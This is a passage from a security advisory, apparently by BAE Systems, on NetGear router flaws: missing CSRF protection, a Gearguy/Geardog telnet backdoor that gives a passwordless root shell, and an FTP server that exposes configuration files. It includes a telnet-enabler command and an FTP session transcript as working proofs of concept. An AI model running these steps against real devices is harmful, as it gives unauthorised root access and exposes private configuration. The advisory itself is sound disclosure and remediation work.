Solution
--------
Validate untrusted user input using a whitelist of acceptable values. For example, hostname values may only contain uppercase or lowercase ASCII letters, the digits '0' through '9', full stops (‘.’) and hyphens ('-').
4. No Cross-Site Request Forgery (CSRF) Protection
===================================================
Requires
--------
Luring a logged in admin user into following a malicious link
Description
-----------
An attacker can lure a user into following an untrusted link to a malicious webpage that will exploit the lack of CSRF protection by forcing the user's web browser to perform unwanted actions, such as altering firewall rules. This attack returns no information to the attacker, so it is effectively 'blind', however this does not detract from the threat.
The command execution vulnerabilities described above can be performed through CSRF.
Impact
------
Using this vulnerability, BAE Systems was able to update configuration of the device, including changing WPA keys, alter firewall rules and perform command execution through exploitation of the ping and DNS features.
Solution
--------
Include an anti-CSRF token in all web forms and ensure that the token is present and correct when HTTP requests for actions are received.
5. Gearguy/Geardog Telnet Backdoor
===================================
Requires
--------
Ability to telnet to port 23 (only on LAN side by default)
Description
-----------
There is a backdoor (feature) built into many NetGear devices, where a user can gain operating system command access without requiring a password. This issue has been previously reported in other NetGear devices.
NetGear provides a windows executable to do this. A Linux client is available from
Send a Blowfish encrypted message to port 23 from the LAN. When you reconnect, it provides a shell without a password required.
Impact
------
Using this vulnerability, BAE Systems was able to gain a root shell on the underlying Linux operating system without supplying any authentication credentials. This would allow complete device compromise, which can be leveraged to backdoor the router, intercept and modify internet traffic, and access connected devices.
Proof of concept
----------------
python telnet-enabler.py 192.168.0.1 "204E7F2172C8" Gearguy Geardog
Sent telnet enable payload to '192.168.0.1:23'
Solution
--------
Remove the backdoor feature from the device. If a ‘last resort’ admin console or reset function is required, implement it to require interaction with the device so that only a person with physical access to the device is able to use this function.
6. FTP Insecure Root Directory
===============================
Requires
--------
FTP to be enabled (not enabled by default)
Description
-----------
The FTP server allows a user to access configuration files and to traverse outside the folder that contains files intended to be shared by FTP.
It is possible to list and retrieve files in the / folder, however the user is restricted from using the cd or CWD command to change the current directory to '/'.
Impact
------
Using this vulnerability, BAE Systems was able to gain access to sensitive configuration files.
Proof of concept
----------------
root@bt# ftp 192.168.0.1
Connected to 192.168.0.1.
230 User logged in.
Name (192.168.0.1:root): ftp
230 User logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT 192.168.0.6:49211 OK
150 BINARY data connection established.
lrwxrwxrwx 1 nobody root 18 Jan 01 2003 USB_Storage
226 Directory list has been submitted.
ftp> cd /
550 Error: Access Denied.
ftp> ls /
200 PORT 192.168.0.6:55927 OK
150 BINARY data connection established.
-rw-r--r-- 1 nobody root 2 Jan 01 2003 all_no_password
-rw-r--r-- 1 nobody root 1700 Jan 01 2003 bftpd.conf
drwxr-xr-x 3 nobody root 0 Jan 01 2003 conf
-rw-r--r-- 1 nobody root 2 Jan 01 2003 lan3_time
-r--r--r-- 1 nobody root 1430 Jan 01 2003 lan_dev
-rw-r--r-- 1 nobody root 2 Jan 01 2003 lan_time
drwxr-xr-x 48 nobody root 0 Jan 01 2003 mnt
-rw-r--r-- 1 nobody root 1 Jan 01 2003 opendns.flag
-rw-r--r-- 1 nobody root 0 Jan 01 2003 opendns.tbl
-rw-r--r-- 1 nobody root 0 Jan 01 2003 opendns_auth.tbl
drwxr-xr-x 2 nobody root 0 Jan 01 2003 ppp
-rw-r--r-- 1 nobody root 38 Jan 01 2003 resolv.conf
-rw-r--r-- 1 nobody root 208 Jan 01 2003 ripd.conf
drwxr-xr-x 4 nobody root 0 Jan 01 2003 samba
drwxr-xr-x 2 nobody root 0 Jan 01 2003 shares
-rw-r--r-- 1 nobody root 262 Jan 01 2003 space_info
-rw------- 1 nobody root 2 Oct 14 14:15 timesync
-rw-r--r-- 1 nobody root 242 Jan 01 2003 udhcpd.conf
-rw-r--r-- 1 nobody root 0 Jan 01 2003 udhcpd.leases
-rw-r--r-- 1 nobody root 4 Jan 01 2003 udhcpd.pid
-rw-r--r-- 1 nobody root 2 Jan 01 2003 udhcpd_resrv.conf
-rw-r--r-- 1 nobody root 3562 Jan 01 2003 upnp_xml
drwxr-xr-x 2 nobody root 0 Jan 01 2003 usb_vol_name
drwxr-xr-x 11 nobody root 0 Jan 01 2003 var
-r--r--r-- 1 nobody root 1922 Jan 01 2003 wan_dev
-rw-r--r-- 1 nobody root 3 Jan 01 2003 wan_time
drwxr-xr-x 2 nobody root 0 Jan 01 1999 wlan
-rw-r--r-- 1 nobody root 2 Jan 01 2003 wlan_time
-rw-r--r-- 1 nobody root 0 Jan 01 2003 zebra.conf
226 Directory list has been submitted.
ftp>
ftp> get /bftpd.conf
local: ./bftpd.conf remote: /bftpd.conf
200 PORT 192.168.0.5:53750 OK
150 BINARY data connection established.
226 File transmission successful.
1454 bytes received in 0.00 secs (3256.7 kB/s)
Solution
--------
Enforce the folder restriction to the /shares folder for all FTP commands.
7. Cannot Disable WPS
======================
Requires
--------
Local proximity and WiFi enabled